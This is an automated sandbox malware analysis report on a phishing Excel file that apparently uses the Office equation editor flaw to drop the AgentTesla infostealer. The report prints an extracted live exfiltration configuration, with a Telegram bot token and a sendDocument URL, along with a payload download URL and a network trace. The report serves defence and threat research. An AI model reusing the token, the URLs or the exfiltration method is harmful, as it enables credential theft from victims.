Windows Analysis Report
Contract - Wipak Oy.xlsx

Overview

General Information

Sample Name: Contract - Wipak Oy.xlsx
Analysis ID: 679189
MD5: d0cd467a481799f5dc06a498e24ff4ad
SHA1: da919b490b8192eab7c577b4a85337d09eb56a9e
SHA256: 831518fee7137eb607ad0fd8b629784dd692f981f6060465079945a13dba6c4c
Tags: xlsx

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Writes to foreign memory regions
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Shellcode detected
Yara detected Generic Downloader
Office equation editor drops PE file
Machine Learning detection for dropped file
Office equation editor establishes network connection
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2960 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2244 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe (PID: 2912 cmdline: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe MD5: 6D370555D43F89189867FD72222C6059)
      • powershell_ise.exe (PID: 304 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe MD5: B3CC5F3514BF58EE55153795CF183754)
        • dw20.exe (PID: 676 cmdline: dw20.exe -x -s 536 MD5: FBA78261A16C65FA44145613E3669E6E)
  • cleanup

Malware Configuration

{"Exfil Mode": "Telegram", "Chat id": "-624834641", "Chat URL": "https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocument"}
Yara matches (Source / Rule / Description / Author / Strings):
Source: sheet1.xml  Rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document  Description: detects AutoLoad documents using LegacyDrawing  Author: ditekSHen
  • 0x1d4:$s1: <legacyDrawing r:id="
  • 0x1fc:$s2: <oleObject progId="
  • 0x23d:$s3: autoLoad="true"
Yara matches (Source / Rule / Description / Author / Strings):
Source: dump.pcap  Rule: Windows_Trojan_AgentTesla_d3ac2b2f  Description: unknown  Author: unknown
  • 0x51280:$a13: get_DnsResolver
  • 0x4f8c2:$a20: get_LastAccessed
  • 0x51cb5:$a27: set_InternalServerPort
  • 0x4f9c9:$a33: get_Clipboard
  • 0x4f9d7:$a34: get_Keyboard
  • 0x50e5e:$a35: get_ShiftKeyDown
  • 0x50e6f:$a36: get_AltKeyDown
  • 0x4f9e4:$a37: get_Password
  • 0x5057c:$a38: get_PasswordHash
  • 0x516a5:$a39: get_DefaultCredentials
Yara matches (Source / Rule / Description / Author / Strings):
Source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp  Rule: JoeSecurity_AgentTesla_1  Description: Yara detected AgentTesla  Author: Joe Security
Source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp  Rule: JoeSecurity_AgentTesla_2  Description: Yara detected AgentTesla  Author: Joe Security
Source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp  Rule: Windows_Trojan_AgentTesla_d3ac2b2f  Description: unknown  Author: unknown
  • 0x30000:$a13: get_DnsResolver
  • 0x2e83e:$a20: get_LastAccessed
  • 0x3095d:$a27: set_InternalServerPort
  • 0x30ca9:$a30: set_GuidMasterKey
  • 0x2e945:$a33: get_Clipboard
  • 0x2e953:$a34: get_Keyboard
  • 0x2fc24:$a35: get_ShiftKeyDown
  • 0x2fc35:$a36: get_AltKeyDown
  • 0x2e960:$a37: get_Password
  • 0x2f3d4:$a38: get_PasswordHash
  • 0x303df:$a39: get_DefaultCredentials
Source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp  Rule: JoeSecurity_AgentTesla_1  Description: Yara detected AgentTesla  Author: Joe Security
Source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp  Rule: JoeSecurity_AgentTesla_2  Description: Yara detected AgentTesla  Author: Joe Security
Yara matches (Source / Rule / Description / Author / Strings):
Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack  Rule: JoeSecurity_AgentTesla_1  Description: Yara detected AgentTesla  Author: Joe Security
Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack  Rule: JoeSecurity_AgentTesla_2  Description: Yara detected AgentTesla  Author: Joe Security
Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack  Rule: JoeSecurity_GenericDownloader_1  Description: Yara detected Generic Downloader  Author: Joe Security
Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack  Rule: MALWARE_Win_AgentTeslaV3  Description: AgentTeslaV3 infostealer payload  Author: ditekSHen
  • 0x37f81:$s10: logins
  • 0x379ee:$s11: credential
  • 0x33f65:$g1: get_Clipboard
  • 0x33f73:$g2: get_Keyboard
  • 0x33f80:$g3: get_Password
  • 0x35234:$g4: get_CtrlKeyDown
  • 0x35244:$g5: get_ShiftKeyDown
  • 0x35255:$g6: get_AltKeyDown
Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack  Rule: Windows_Trojan_AgentTesla_d3ac2b2f  Description: unknown  Author: unknown
  • 0x35640:$a13: get_DnsResolver
  • 0x33e5e:$a20: get_LastAccessed
  • 0x35f9d:$a27: set_InternalServerPort
  • 0x362e9:$a30: set_GuidMasterKey
  • 0x33f65:$a33: get_Clipboard
  • 0x33f73:$a34: get_Keyboard
  • 0x35244:$a35: get_ShiftKeyDown
  • 0x35255:$a36: get_AltKeyDown
  • 0x33f80:$a37: get_Password
  • 0x349f4:$a38: get_PasswordHash
  • 0x35a1f:$a39: get_DefaultCredentials

                Exploits

Sigma rule: File Dropped By EQNEDT32EXE  Source: File created  Author: Joe Security  Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2244, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\qGTGx[1].exe
                No Snort rule has matched

                AV Detection

Source: Contract - Wipak Oy.xlsx  Virustotal: Detection: 53%
Source: Contract - Wipak Oy.xlsx  ReversingLabs: Detection: 41%
Source: Contract - Wipak Oy.xlsx  Avira: detected
Source: http://109.206.241.81/htdocs/zTALg.exe  Avira URL Cloud: Label: malware
Source: http://109.206.241.81/htdocs/zTALg.exe  Virustotal: Detection: 19%
Source: Contract - Wipak Oy.xlsx  Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe  Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\qGTGx[1].exe  Joe Sandbox ML: detected
Source: 6.0.powershell_ise.exe.400000.0.unpack  Avira: Label: TR/Spy.Gen8
Source: 6.0.powershell_ise.exe.400000.0.unpack  Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "-624834641", "Chat URL": "https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocument"}

                Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Process created: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Network connect: IP: 136.243.86.20 Port: 443
Source: unknown  Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown  HTTPS traffic detected: 136.243.86.20:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown  HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.22:49172 version: TLS 1.2
                Source: Binary string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\powershell_ise.pdbw source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\exe\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: powershell_ise.pdbD source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: 9C:\Win.pdbSys source: powershell_ise.exe, 00000006.00000002.1027185092.0000000000398000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: .pdbN source: powershell_ise.exe, 00000006.00000002.1027185092.0000000000398000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: indows\symbols\exe\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\Users\Administrator\AppData\Local\Temp\2\System.Activities.pdb source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996241614.000000000060A000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000000.992431011.0000000000FF2000.00000020.00000001.01000000.00000005.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.2.dr, qGTGx[1].exe.2.dr
                Source: Binary string: T3npC:\Windows\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027185092.0000000000398000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp, powershell_ise.exe, 00000006.00000002.1027747753.000000000478D000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: indows\powershell_ise.pdbpdbise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp

                Software Vulnerabilities

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Code function: 2_2_038A8B6F LoadLibraryW,URLDownloadToFileW  2_2_038A8B6F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Code function: 2_2_038A8C60 LoadLibraryW,ExitProcess  2_2_038A8C60
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Code function: 2_2_038A8BFC URLDownloadToFileW  2_2_038A8BFC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Code function: 2_2_038A8C70 ExitProcess  2_2_038A8C70
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Code function: 2_2_038A8C90 ExitProcess  2_2_038A8C90
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Code function: 2_2_038A8C2D ExitProcess  2_2_038A8C2D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Code function: 2_2_038A8C17 ExitProcess  2_2_038A8C17
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Code function: 2_2_038A8B97 URLDownloadToFileW  2_2_038A8B97
Source: global traffic  DNS query: name: pkusukoharjo.com
Source: global traffic  DNS query: name: cdn.discordapp.com
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: excel.exe | Memory has grown: Private usage: 4MB later: 117MB

                Networking

                Source: Yara match | File source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Joe Sandbox View | ASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: Joe Sandbox View | JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
